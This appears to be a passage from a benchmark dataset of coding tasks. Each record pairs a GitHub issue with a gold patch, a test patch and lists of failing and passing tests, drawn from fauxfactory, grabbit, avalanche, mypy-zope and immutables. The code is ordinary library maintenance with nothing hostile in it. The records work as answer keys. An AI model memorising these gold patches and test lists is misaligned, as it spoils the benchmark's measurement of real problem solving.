+ """Simple decorator to validate values generate by fcn accordingly to
+ parameters `validator`, `default` and `tries`
+
+ :param fcn: function to be enhanced
+ :return: decorated function
+ """
+
+ @wraps(fcn)
+ def validate(*args, **kwargs):
+ validator = kwargs.get('validator')
+ default = kwargs.get('default')
+ tries = kwargs.get('tries', 10)
+ if validator and default is None:
+ raise ValueError('If "validator" param is defined, "default" '
+ 'parameter must not be None')
+ if validator is None:
+ def validator_fcn(_):
+ return True
+ else:
+ validator_fcn = validator
+
+ if not callable(validator_fcn):
+ def regex_validator(value):
+ return re.match(validator, value)
+
+ validator_fcn = regex_validator
+
+ # Removing params related to validation but not fcn
+ for key in ('validator', 'default', 'tries'):
+ if key in kwargs:
+ kwargs.pop(key)
+
+ for _ in range(tries):
+ value = fcn(*args, **kwargs)
+ if validator_fcn(value):
+ return value
+
+ return default
+
+ return validate
+
+
# Public Functions ------------------------------------------------------------
-def gen_string(str_type, length=None):
+def gen_string(str_type, length=None, validator=None, default=None, tries=10):
"""A simple wrapper that calls other string generation methods.
:param str str_type: The type of string which should be generated.
:param int length: The length of the generated string. Must be 1 or
greater.
+ :param validator: Function or regex (str).
+ If a function it must receive one parameter and return True if value
+ can be used and False of another value need to be generated.
+ If str it will be used as regex to validate the generated value.
+ Default is None which will not validate the value.
+ :param tries: number of times validator must be called before returning
+ `default`. Default is 10.
+ :param default: If validator returns false a number of `tries` times, this
+ value is returned instead. Must be defined if validator is not None
:raises: ``ValueError`` if an invalid ``str_type`` is specified.
:returns: A string.
:rtype: str
@@ -146,10 +197,11 @@ def gen_string(str_type, length=None):
)
method = str_types_functions[str_type_lower]
if length is None:
- return method()
- return method(length)
+ return method(validator=validator, default=default, tries=tries)
+ return method(length, validator=validator, default=default, tries=tries)
+@_check_validation
def gen_alpha(length=10):
"""Returns a random string made up of alpha characters.
@@ -170,6 +222,7 @@ def gen_alpha(length=10):
return _make_unicode(output_string)
+@_check_validation
def gen_alphanumeric(length=10):
"""Returns a random string made up of alpha and numeric characters.
@@ -230,6 +283,7 @@ def gen_choice(choices):
return random.choice(choices)
+@_check_validation
def gen_cjk(length=10):
"""Returns a random string made up of CJK characters.
(Source: Wikipedia - CJK Unified Ideographs)
@@ -257,6 +311,7 @@ def gen_cjk(length=10):
return _make_unicode(output)
+@_check_validation
def gen_cyrillic(length=10):
"""Returns a random string made up of Cyrillic characters.
@@ -362,6 +417,7 @@ def gen_datetime(min_date=None, max_date=None):
return min_date + datetime.timedelta(seconds=seconds)
+@_check_validation
def gen_email(name=None, domain=None, tlds=None):
"""Generates a random email address.
@@ -488,6 +544,7 @@ def gen_iplum(words=None, paragraphs=None):
return _make_unicode(result.rstrip())
+@_check_validation
def gen_latin1(length=10):
"""Returns a random string made up of UTF-8 characters.
(Font: Wikipedia - Latin-1 Supplement Unicode Block)
@@ -542,6 +599,7 @@ def gen_negative_integer():
return gen_integer(max_value=max_value)
+@_check_validation
def gen_ipaddr(ip3=False, ipv6=False, prefix=()):
"""Generates a random IP address.
You can also specify an IP address prefix if you are interested in
@@ -599,6 +657,7 @@ def gen_ipaddr(ip3=False, ipv6=False, prefix=()):
return _make_unicode(ipaddr)
+@_check_validation
def gen_mac(delimiter=':', multicast=None, locally=None):
"""Generates a random MAC address.
@@ -647,6 +706,7 @@ def gen_mac(delimiter=':', multicast=None, locally=None):
return _make_unicode(mac)
+@_check_validation
def gen_netmask(min_cidr=1, max_cidr=31):
"""Generates a random valid netmask.
@@ -674,6 +734,7 @@ def gen_netmask(min_cidr=1, max_cidr=31):
return VALID_NETMASKS[random.randint(min_cidr, max_cidr)]
+@_check_validation
def gen_numeric_string(length=10):
"""Returns a random string made up of numbers.
@@ -723,6 +784,7 @@ def gen_time():
)
+@_check_validation
def gen_url(scheme=None, subdomain=None, tlds=None):
"""Generates a random URL address
@@ -765,6 +827,7 @@ def gen_url(scheme=None, subdomain=None, tlds=None):
return _make_unicode(url)
+@_check_validation
def gen_utf8(length=10):
"""Returns a random string made up of UTF-8 letters characters, as per
`RFC 3629`_.
@@ -783,6 +846,7 @@ def gen_utf8(length=10):
return u''.join([random.choice(UNICODE_LETTERS) for _ in range(length)])
+@_check_validation
def gen_uuid():
"""Generates a UUID string (universally unique identifiers).
@@ -796,6 +860,7 @@ def gen_uuid():
return output_uuid
+@_check_validation
def gen_html(length=10):
"""Returns a random string made up of html characters.
@@ -816,6 +881,7 @@ def gen_html(length=10):
return _make_unicode(output_string)
+@_check_validation
def gen_html_with_total_len(length=10):
"""Returns a random string made up of html characters.
This differ from fauxfactory.gen_html because length takes html tag chars
diff --git a/requirements-optional.txt b/requirements-optional.txt
index 7b50cdd..2c1ab56 100644
--- a/requirements-optional.txt
+++ b/requirements-optional.txt
@@ -3,3 +3,4 @@ coveralls
flake8
pylint
Sphinx
+mock
|
omaciel/fauxfactory
|
87611f293f9329ea024d93f5699c287f0725b5e5
|
diff --git a/tests/test_check_validation.py b/tests/test_check_validation.py
new file mode 100644
index 0000000..8ba9460
--- /dev/null
+++ b/tests/test_check_validation.py
@@ -0,0 +1,69 @@
+# -*- coding: utf-8 -*-
+
+from sys import version_info
+
+from fauxfactory import _check_validation
+
+if version_info[0:2] == (2, 6):
+ import unittest2 as unittest
+else:
+ import unittest
+ if version_info[0] == 2:
+ from mock import Mock
+ else:
+ from unittest.mock import Mock
+
+
+@_check_validation
+def decorated_f():
+ return 'not a number'
+
+
+class CheckValidationTestCase(unittest.TestCase):
+ """_check_validation decorator tests"""
+
+ def test_no_validator_defined(self):
+ """Check result value of decorated function is returned when no
+ validator is provided
+ """
+ self.assertEqual('not a number', decorated_f())
+
+ def test_validator_defined_but_default_is_none(self):
+ """Check defining validator but not default raises an error"""
+ self.assertRaises(ValueError, decorated_f, validator=lambda _: True)
+
+ def test_regex(self):
+ """Check regex validation when validator is a string"""
+ self.assertEqual(
+ 'my default', decorated_f(validator=r'\d.*', default='my default'))
+ self.assertEqual(
+ 'not a number', decorated_f(validator=r'.*', default='my default'))
+
+ def test_callable(self):
+ """Check validation when validator is a callable"""
+ callable = Mock(return_value=False)
+
+ # Default of 10 unsuccessful tries
+ self.assertEqual(
+ 'my default',
+ decorated_f(validator=callable, default='my default')
+ )
+ callable.assert_called_with('not a number')
+ self.assertEqual(10, callable.call_count)
+
+ # 1 unsuccessful try
+ callable.reset_mock()
+ self.assertEqual(
+ 'my default',
+ decorated_f(validator=callable, default='my default', tries=1)
+ )
+ callable.assert_called_once_with('not a number')
+
+ # 1 successful try
+ callable.reset_mock()
+ callable.return_value = True
+ self.assertEqual(
+ 'not a number',
+ decorated_f(validator=callable, default='my default', tries=10)
+ )
+ callable.assert_called_once_with('not a number')
|
add validator argument
Example: we want to generate names, but names cannot start with numbers.
```python
from fauxfactory import gen_string
name = gen_string(
'alpha',
validator=lambda x: not x.startswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')),
default='foobar',
tries=10
)
or simpler
name = gen_string(
'alpha',
validator=lambda x: not x[0].isdigit(),
default='foobar',
tries=10
)
```
So fauxfactory should accept `validator` which should return True, otherwise the value is `None` or `default`. If `tries` is set, then it retries to generate 10 times, if `tries` = `0` it tries to generate until validator is met!
BONUS: the validator must be callable or `re.Pattern` instance, so it checks for regex matching.
|
0.0
|
87611f293f9329ea024d93f5699c287f0725b5e5
|
[
"tests/test_check_validation.py::CheckValidationTestCase::test_callable",
"tests/test_check_validation.py::CheckValidationTestCase::test_no_validator_defined",
"tests/test_check_validation.py::CheckValidationTestCase::test_regex",
"tests/test_check_validation.py::CheckValidationTestCase::test_validator_defined_but_default_is_none"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-03-15 13:14:22+00:00
|
apache-2.0
| 4,349
|
|
grabbles__grabbit-6
|
diff --git a/grabbit/core.py b/grabbit/core.py
index 84009db..a2a87be 100644
--- a/grabbit/core.py
+++ b/grabbit/core.py
@@ -197,7 +197,7 @@ class Layout(object):
return_type (str): Type of result to return. Valid values:
'tuple': returns a list of namedtuples containing file name as
well as attribute/value pairs for all named entities.
- 'file': returns a list of File instances.
+ 'file': returns a list of matching filenames.
'dir': returns a list of directories.
'id': returns a list of unique IDs. Must be used together with
a valid target.
@@ -222,7 +222,7 @@ class Layout(object):
result.append(file)
if return_type == 'file':
- return result
+ return natural_sort([f.path for f in result])
if return_type == 'tuple':
result = [r.as_named_tuple() for r in result]
|
grabbles/grabbit
|
afe361809ca5c040a46caa9f8a9bae017bcc706e
|
diff --git a/grabbit/tests/test_core.py b/grabbit/tests/test_core.py
index 0c92377..11da286 100644
--- a/grabbit/tests/test_core.py
+++ b/grabbit/tests/test_core.py
@@ -127,6 +127,8 @@ class TestLayout:
result = layout.get(target='subject', return_type='dir')
assert os.path.exists(result[0])
assert os.path.isdir(result[0])
+ result = layout.get(target='subject', type='phasediff', return_type='file')
+ assert all([os.path.exists(f) for f in result])
def test_unique_and_count(self, layout):
result = layout.unique('subject')
|
Redefining File class is confusing
Returning File objects which are something different that python build in [file object](https://docs.python.org/3/glossary.html#term-file-object)
|
0.0
|
afe361809ca5c040a46caa9f8a9bae017bcc706e
|
[
"grabbit/tests/test_core.py::TestLayout::test_querying"
] |
[
"grabbit/tests/test_core.py::TestFile::test_init",
"grabbit/tests/test_core.py::TestFile::test_matches",
"grabbit/tests/test_core.py::TestFile::test_named_tuple",
"grabbit/tests/test_core.py::TestEntity::test_init",
"grabbit/tests/test_core.py::TestEntity::test_matches",
"grabbit/tests/test_core.py::TestEntity::test_unique_and_count",
"grabbit/tests/test_core.py::TestEntity::test_add_file",
"grabbit/tests/test_core.py::TestLayout::test_init",
"grabbit/tests/test_core.py::TestLayout::test_absolute_paths",
"grabbit/tests/test_core.py::TestLayout::test_dynamic_getters",
"grabbit/tests/test_core.py::TestLayout::test_unique_and_count"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-08-18 05:30:39+00:00
|
mit
| 2,661
|
|
ContinualAI__avalanche-1216
|
diff --git a/avalanche/benchmarks/utils/data.py b/avalanche/benchmarks/utils/data.py
index 533d79ee..9c11f60f 100644
--- a/avalanche/benchmarks/utils/data.py
+++ b/avalanche/benchmarks/utils/data.py
@@ -101,6 +101,10 @@ class AvalancheDataset(FlatData):
DeprecationWarning,
)
+ if issubclass(type(datasets), TorchDataset) or \
+ issubclass(type(datasets), AvalancheDataset):
+ datasets = [datasets]
+
# NOTES on implementation:
# - raw datasets operations are implemented by _FlatData
# - data attributes are implemented by DataAttribute
diff --git a/avalanche/training/templates/base.py b/avalanche/training/templates/base.py
index c0899806..532e8332 100644
--- a/avalanche/training/templates/base.py
+++ b/avalanche/training/templates/base.py
@@ -1,4 +1,5 @@
import warnings
+from collections import defaultdict
from typing import Iterable, Sequence, Optional, Union, List
import torch
@@ -90,6 +91,9 @@ class BaseTemplate:
:param eval_streams: sequence of streams for evaluation.
If None: use training experiences for evaluation.
Use [] if you do not want to evaluate during training.
+ Experiences in `eval_streams` are grouped by stream name
+ when calling `eval`. If you use multiple streams, they must
+ have different names.
"""
self.is_training = True
self._stop_training = False
@@ -102,7 +106,7 @@ class BaseTemplate:
experiences = [experiences]
if eval_streams is None:
eval_streams = [experiences]
- self._eval_streams = eval_streams
+ self._eval_streams = _group_experiences_by_stream(eval_streams)
self._before_training(**kwargs)
@@ -244,3 +248,20 @@ class BaseTemplate:
def _after_eval_exp(self, **kwargs):
trigger_plugins(self, "after_eval_exp", **kwargs)
+
+
+def _group_experiences_by_stream(eval_streams):
+ exps = []
+ # First, we unpack the list of experiences.
+ for exp in eval_streams:
+ if isinstance(exp, Iterable):
+ exps.extend(exp)
+ else:
+ exps.append(exp)
+ # Then, we group them by stream.
+ exps_by_stream = defaultdict(list)
+ for exp in exps:
+ sname = exp.origin_stream.name
+ exps_by_stream[sname].append(exp)
+ # Finally, we return a list of lists.
+ return list(exps_by_stream.values())
|
ContinualAI/avalanche
|
f3abbc5500c928bb5fc5bcf4b31fcd0b504fdf26
|
diff --git a/tests/test_avalanche_dataset.py b/tests/test_avalanche_dataset.py
index e7cf460b..67ccdecc 100644
--- a/tests/test_avalanche_dataset.py
+++ b/tests/test_avalanche_dataset.py
@@ -56,6 +56,17 @@ class FrozenTransformGroupsCenterCrop:
class AvalancheDatasetTests(unittest.TestCase):
+
+ def test_avalanche_dataset_creation_without_list(self):
+ dataset_mnist = load_image_benchmark()
+ dataset = AvalancheDataset(dataset_mnist)
+ self.assertIsInstance(dataset, AvalancheDataset)
+ self.assertEqual(len(dataset_mnist), len(dataset))
+
+ dataset = AvalancheDataset(dataset)
+ self.assertIsInstance(dataset, AvalancheDataset)
+ self.assertEqual(len(dataset_mnist), len(dataset))
+
def test_disallowed_attribute_name(self):
d_sz = 3
xdata = torch.rand(d_sz, 2)
diff --git a/tests/training/test_strategies.py b/tests/training/test_strategies.py
index 84fae146..a49b2d20 100644
--- a/tests/training/test_strategies.py
+++ b/tests/training/test_strategies.py
@@ -48,11 +48,37 @@ from avalanche.training.supervised.icarl import ICaRL
from avalanche.training.supervised.joint_training import AlreadyTrainedError
from avalanche.training.supervised.strategy_wrappers import PNNStrategy
from avalanche.training.templates import SupervisedTemplate
+from avalanche.training.templates.base import _group_experiences_by_stream
from avalanche.training.utils import get_last_fc_layer
from tests.unit_tests_utils import get_fast_benchmark, get_device
class BaseStrategyTest(unittest.TestCase):
+ def test_eval_streams_normalization(self):
+ benchmark = get_fast_benchmark()
+ train_len = len(benchmark.train_stream)
+ test_len = len(benchmark.test_stream)
+
+ res = _group_experiences_by_stream(benchmark.test_stream)
+ assert len(res) == 1
+ assert len(res[0]) == test_len
+
+ res = _group_experiences_by_stream([benchmark.test_stream])
+ assert len(res) == 1
+ assert len(res[0]) == test_len
+
+ res = _group_experiences_by_stream(
+ [*benchmark.test_stream, *benchmark.train_stream])
+ assert len(res) == 2
+ assert len(res[0]) == test_len
+ assert len(res[1]) == train_len
+
+ res = _group_experiences_by_stream(
+ [benchmark.test_stream, benchmark.train_stream])
+ assert len(res) == 2
+ assert len(res[0]) == test_len
+ assert len(res[1]) == train_len
+
def test_periodic_eval(self):
model = SimpleMLP(input_size=6, hidden_size=10)
model.classifier = IncrementalClassifier(model.classifier.in_features)
|
bug for stream-level metrics in periodic eval
periodic eval is broken in some subtle cases. Instead of calling `eval` on the entire stream, it calls it multiple times for each experience, breaking stream-level metrics.
Reproduce:
```
from avalanche.benchmarks import SplitMNIST
from avalanche.training import Naive
from avalanche.models import SimpleMLP
if __name__ == '__main__':
benchmark = SplitMNIST(5)
model = SimpleMLP()
strat = Naive(model, None, eval_mb_size=512, eval_every=1)
stream = benchmark.test_stream
strat.train(stream[0], eval_streams=list(stream[:2]))
```
outputs:
```
-- >> Start of training phase << --
-- >> Start of eval phase << --
-- Starting eval on experience 0 (Task 0) from test stream --
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:05<00:00, 1.08s/it]
> Eval on experience 0 (Task 0) from test stream ended.
Loss_Exp/eval_phase/test_stream/Task000/Exp000 = 2.3881
Top1_Acc_Exp/eval_phase/test_stream/Task000/Exp000 = 0.0033
-- >> End of eval phase << --
Loss_Stream/eval_phase/test_stream/Task000 = 2.3881
Top1_Acc_Stream/eval_phase/test_stream/Task000 = 0.0033
-- >> Start of eval phase << --
-- Starting eval on experience 1 (Task 0) from test stream --
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:01<00:00, 2.12it/s]
> Eval on experience 1 (Task 0) from test stream ended.
Loss_Exp/eval_phase/test_stream/Task000/Exp001 = 2.3041
Top1_Acc_Exp/eval_phase/test_stream/Task000/Exp001 = 0.2129
-- >> End of eval phase << --
Loss_Stream/eval_phase/test_stream/Task000 = 2.3041
Top1_Acc_Stream/eval_phase/test_stream/Task000 = 0.2129
```
which means it's calling `eval` two times instead of a single one with the entire stream.
|
0.0
|
f3abbc5500c928bb5fc5bcf4b31fcd0b504fdf26
|
[
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_avalanche_dataset_tensor_task_labels",
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_disallowed_attribute_name",
"tests/test_avalanche_dataset.py::AvalancheDatasetTests::test_subset_subset_merge",
"tests/training/test_strategies.py::BaseStrategyTest::test_early_stop",
"tests/training/test_strategies.py::BaseStrategyTest::test_eval_streams_normalization",
"tests/training/test_strategies.py::BaseStrategyTest::test_forward_hooks",
"tests/training/test_strategies.py::BaseStrategyTest::test_periodic_eval",
"tests/training/test_strategies.py::BaseStrategyTest::test_plugins_compatibility_checks",
"tests/training/test_strategies.py::StrategyTest::test_agem",
"tests/training/test_strategies.py::StrategyTest::test_cope",
"tests/training/test_strategies.py::StrategyTest::test_cumulative",
"tests/training/test_strategies.py::StrategyTest::test_cwrstar",
"tests/training/test_strategies.py::StrategyTest::test_ewc",
"tests/training/test_strategies.py::StrategyTest::test_ewc_online",
"tests/training/test_strategies.py::StrategyTest::test_gdumb",
"tests/training/test_strategies.py::StrategyTest::test_gem",
"tests/training/test_strategies.py::StrategyTest::test_icarl",
"tests/training/test_strategies.py::StrategyTest::test_joint",
"tests/training/test_strategies.py::StrategyTest::test_lfl",
"tests/training/test_strategies.py::StrategyTest::test_lwf",
"tests/training/test_strategies.py::StrategyTest::test_mas",
"tests/training/test_strategies.py::StrategyTest::test_naive",
"tests/training/test_strategies.py::StrategyTest::test_pnn",
"tests/training/test_strategies.py::StrategyTest::test_replay",
"tests/training/test_strategies.py::StrategyTest::test_slda",
"tests/training/test_strategies.py::StrategyTest::test_synaptic_intelligence",
"tests/training/test_strategies.py::StrategyTest::test_warning_slda_lwf"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-21 16:04:01+00:00
|
mit
| 147
|
|
Shoobx__mypy-zope-88
|
diff --git a/src/mypy_zope/plugin.py b/src/mypy_zope/plugin.py
index 46bdc1b..0c7971e 100644
--- a/src/mypy_zope/plugin.py
+++ b/src/mypy_zope/plugin.py
@@ -698,7 +698,10 @@ class ZopeInterfacePlugin(Plugin):
if not any(promote in ti._promote for ti in impl.mro):
faketi = TypeInfo(SymbolTable(), iface.defn, iface.module_name)
faketi._promote = [promote]
- impl.mro.append(faketi)
+ faketi.metaclass_type = iface.metaclass_type
+ # Insert the TypeInfo before the builtins.object that's at the end.
+ assert impl.mro[-1].fullname == 'builtins.object'
+ impl.mro.insert(len(impl.mro) - 1, faketi)
def plugin(version: str) -> PyType[Plugin]:
|
Shoobx/mypy-zope
|
3c767525b740a35e7039bf792ccfbce8590044d7
|
diff --git a/tests/test_mro_calculation.py b/tests/test_mro_calculation.py
index a051dcc..eb9cf5d 100644
--- a/tests/test_mro_calculation.py
+++ b/tests/test_mro_calculation.py
@@ -59,10 +59,10 @@ def test_mro_computation_in_forward_reference_to_implementer(mypy_cache_dir: str
mro: List[TypeInfo] = node.node.mro
# Expected: [
# <TypeInfo forward_reference_to_implementer.Protocol@21>,
- # <TypeInfo builtins.object>,
# <TypeInfo forward_reference_to_implementer.IProtocol>,
+ # <TypeInfo builtins.object>,
# ]
assert len(mro) == 3
assert mro[0].fullname.startswith(f"{sample_name}.Protocol")
- assert mro[1].fullname == "builtins.object"
- assert mro[2].fullname == f"{sample_name}.IProtocol"
+ assert mro[1].fullname == f"{sample_name}.IProtocol"
+ assert mro[2].fullname == "builtins.object"
|
Caching error (Metaclass conflict) with mypy 0.991
Hi. With the latest version of mypy (0.991) and mypy-zope (0.3.11) we're getting mypy errors that I think are cache related. The error goes away after `rm -rf .mypy_cache`
Here's the easiest repro I could make:
iface.py
```
from zope.interface import Interface
from zope.interface import implementer
class ISomething(Interface):
pass
class ISomething2(Interface):
pass
@implementer(ISomething)
class OneInterface:
pass
@implementer(ISomething, ISomething2)
class TwoInterfaces:
pass
```
foo.py
```
from iface import OneInterface, TwoInterfaces
class Good(OneInterface):
pass
class Bad(TwoInterfaces):
pass
```
I am able to reliably hit the problem by running the following commands:
```
$ rm -rf .mypy_cache
$ mypy iface.py
Success: no issues found in 1 source file
$ mypy foo.py
foo.py:6: error: Metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases [misc]
Found 1 error in 1 file (checked 1 source file)
```
As you can tell this only happens when there are multiple interfaces.
|
0.0
|
3c767525b740a35e7039bf792ccfbce8590044d7
|
[
"tests/test_mro_calculation.py::test_mro_computation_in_forward_reference_to_implementer"
] |
[] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-02-08 00:06:06+00:00
|
mit
| 706
|
|
MagicStack__immutables-58
|
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index c992bda..7e2c51b 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -45,13 +45,13 @@ jobs:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
- name: Set up Python 3.7
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
with:
python-version: 3.7
@@ -70,7 +70,7 @@ jobs:
runs-on: ${{ matrix.os }}
strategy:
matrix:
- python-version: [3.5, 3.6, 3.7, 3.8]
+ python-version: [3.5, 3.6, 3.7, 3.8, 3.9]
os: [ubuntu-16.04, macos-latest, windows-latest]
exclude:
# Python 3.5 is unable to properly
@@ -80,13 +80,13 @@ jobs:
python-version: 3.5
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
@@ -130,7 +130,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 5
submodules: false
diff --git a/README.rst b/README.rst
index e62545e..4132bc0 100644
--- a/README.rst
+++ b/README.rst
@@ -12,7 +12,8 @@ An immutable mapping type for Python.
The underlying datastructure is a Hash Array Mapped Trie (HAMT)
used in Clojure, Scala, Haskell, and other functional languages.
This implementation is used in CPython 3.7 in the ``contextvars``
-module (see PEP 550 and PEP 567 for more details).
+module (see `PEP 550 <https://www.python.org/dev/peps/pep-0550/>`_ and
+`PEP 567 <https://www.python.org/dev/peps/pep-0567/>`_ for more details).
Immutable mappings based on HAMT have O(log N) performance for both
``set()`` and ``get()`` operations, which is essentially O(1) for
diff --git a/immutables/_map.c b/immutables/_map.c
index 9f0a586..7e510fd 100644
--- a/immutables/_map.c
+++ b/immutables/_map.c
@@ -3194,14 +3194,14 @@ map_py_repr(BaseMapObject *m)
if (MapMutation_Check(m)) {
if (_PyUnicodeWriter_WriteASCIIString(
- &writer, "<immutables.MapMutation({", 25) < 0)
+ &writer, "immutables.MapMutation({", 24) < 0)
{
goto error;
}
}
else {
if (_PyUnicodeWriter_WriteASCIIString(
- &writer, "<immutables.Map({", 17) < 0)
+ &writer, "immutables.Map({", 16) < 0)
{
goto error;
}
@@ -3255,16 +3255,6 @@ map_py_repr(BaseMapObject *m)
goto error;
}
- PyObject *addr = PyUnicode_FromFormat(" at %p>", m);
- if (addr == NULL) {
- goto error;
- }
- if (_PyUnicodeWriter_WriteStr(&writer, addr) < 0) {
- Py_DECREF(addr);
- goto error;
- }
- Py_DECREF(addr);
-
Py_ReprLeave((PyObject *)m);
return _PyUnicodeWriter_Finish(&writer);
diff --git a/immutables/map.py b/immutables/map.py
index 7c16139..fe9dbaf 100644
--- a/immutables/map.py
+++ b/immutables/map.py
@@ -649,8 +649,7 @@ class Map:
items = []
for key, val in self.items():
items.append("{!r}: {!r}".format(key, val))
- return '<immutables.Map({{{}}}) at 0x{:0x}>'.format(
- ', '.join(items), id(self))
+ return 'immutables.Map({{{}}})'.format(', '.join(items))
def __dump__(self): # pragma: no cover
buf = []
@@ -818,8 +817,7 @@ class MapMutation:
items = []
for key, val in self.__root.items():
items.append("{!r}: {!r}".format(key, val))
- return '<immutables.MapMutation({{{}}}) at 0x{:0x}>'.format(
- ', '.join(items), id(self))
+ return 'immutables.MapMutation({{{}}})'.format(', '.join(items))
def __len__(self):
return self.__count
diff --git a/setup.py b/setup.py
index b54270d..cb31d2c 100644
--- a/setup.py
+++ b/setup.py
@@ -59,6 +59,7 @@ setuptools.setup(
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
+ 'Programming Language :: Python :: 3.9',
'Operating System :: POSIX',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
|
MagicStack/immutables
|
45105ecd8b56a4d88dbcb380fcb8ff4b9cc7b19c
|
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 45367be..019007f 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -15,7 +15,7 @@ jobs:
strategy:
max-parallel: 4
matrix:
- python-version: [3.5, 3.6, 3.7, 3.8]
+ python-version: [3.5, 3.6, 3.7, 3.8, 3.9]
os: [windows-latest, ubuntu-18.04, macos-latest]
exclude:
# Python 3.5 is unable to properly
@@ -25,7 +25,7 @@ jobs:
python-version: 3.5
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
@@ -41,7 +41,7 @@ jobs:
__version__\s*=\s*(?:['"])([[:PEP440:]])(?:['"])
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
if: steps.release.outputs.version == 0
with:
python-version: ${{ matrix.python-version }}
diff --git a/tests/test_map.py b/tests/test_map.py
index b6ee7f1..4a473b3 100644
--- a/tests/test_map.py
+++ b/tests/test_map.py
@@ -845,11 +845,10 @@ class BaseMapTest:
def test_repr_1(self):
h = self.Map()
- self.assertTrue(repr(h).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({})')
h = h.set(1, 2).set(2, 3).set(3, 4)
- self.assertTrue(repr(h).startswith(
- '<immutables.Map({1: 2, 2: 3, 3: 4}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({1: 2, 2: 3, 3: 4})')
def test_repr_2(self):
h = self.Map()
@@ -879,8 +878,7 @@ class BaseMapTest:
h = h.set(k, 1)
k.val = h
- self.assertTrue(repr(h).startswith(
- '<immutables.Map({{...}: 1}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({{...}: 1})')
def test_hash_1(self):
h = self.Map()
@@ -964,8 +962,7 @@ class BaseMapTest:
h = h.set('a', 1)
hm1 = h.mutate()
- self.assertTrue(repr(hm1).startswith(
- "<immutables.MapMutation({'a': 1})"))
+ self.assertEqual(repr(hm1), "immutables.MapMutation({'a': 1})")
with self.assertRaisesRegex(TypeError, 'unhashable type'):
hash(hm1)
diff --git a/tests/test_none_keys.py b/tests/test_none_keys.py
index f7969f3..92e7813 100644
--- a/tests/test_none_keys.py
+++ b/tests/test_none_keys.py
@@ -61,7 +61,7 @@ class BaseNoneTest:
self.assertEqual(len(m), 1)
self.assertTrue(None in m)
self.assertEqual(m[None], 1)
- self.assertTrue(repr(m).startswith('<immutables.Map({None: 1}) at 0x'))
+ self.assertEqual(repr(m), 'immutables.Map({None: 1})')
for level in range(7):
key = NoneCollision('a', level)
@@ -72,7 +72,7 @@ class BaseNoneTest:
m = m.delete(None)
self.assertEqual(len(m), 0)
self.assertFalse(None in m)
- self.assertTrue(repr(m).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m), 'immutables.Map({})')
self.assertEqual(m, self.Map())
@@ -125,7 +125,7 @@ class BaseNoneTest:
self.assertFalse(None in m3)
self.assertFalse(key in m3)
self.assertEqual(m3, self.Map())
- self.assertTrue(repr(m3).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m3), 'immutables.Map({})')
with self.assertRaises(KeyError):
m3.delete(None)
with self.assertRaises(KeyError):
@@ -144,7 +144,7 @@ class BaseNoneTest:
self.assertFalse(None in m4)
self.assertFalse(key in m4)
self.assertEqual(m4, self.Map())
- self.assertTrue(repr(m4).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m4), 'immutables.Map({})')
with self.assertRaises(KeyError):
m4.delete(None)
with self.assertRaises(KeyError):
|
`immutables.Map.__str__` doesn't match `dict.__str__`
```python
In [7]: d = {'a': 1}
In [8]: str(d)
Out[8]: "{'a': 1}"
In [9]: str(immutables.Map(d))
Out[9]: "<immutables.Map({'a': 1}) at 0x108ed56c0>"
```
|
0.0
|
45105ecd8b56a4d88dbcb380fcb8ff4b9cc7b19c
|
[
"tests/test_map.py::PyMapTest::test_map_mut_3",
"tests/test_map.py::PyMapTest::test_repr_1",
"tests/test_map.py::PyMapTest::test_repr_3",
"tests/test_none_keys.py::PyMapNoneTest::test_none_as_key",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_1"
] |
[
"tests/test_map.py::PyMapTest::test_abc_1",
"tests/test_map.py::PyMapTest::test_hash_1",
"tests/test_map.py::PyMapTest::test_hash_2",
"tests/test_map.py::PyMapTest::test_hashkey_helper_1",
"tests/test_map.py::PyMapTest::test_kwarg_named_col",
"tests/test_map.py::PyMapTest::test_map_basics_1",
"tests/test_map.py::PyMapTest::test_map_basics_2",
"tests/test_map.py::PyMapTest::test_map_basics_3",
"tests/test_map.py::PyMapTest::test_map_basics_4",
"tests/test_map.py::PyMapTest::test_map_collision_1",
"tests/test_map.py::PyMapTest::test_map_collision_2",
"tests/test_map.py::PyMapTest::test_map_delete_1",
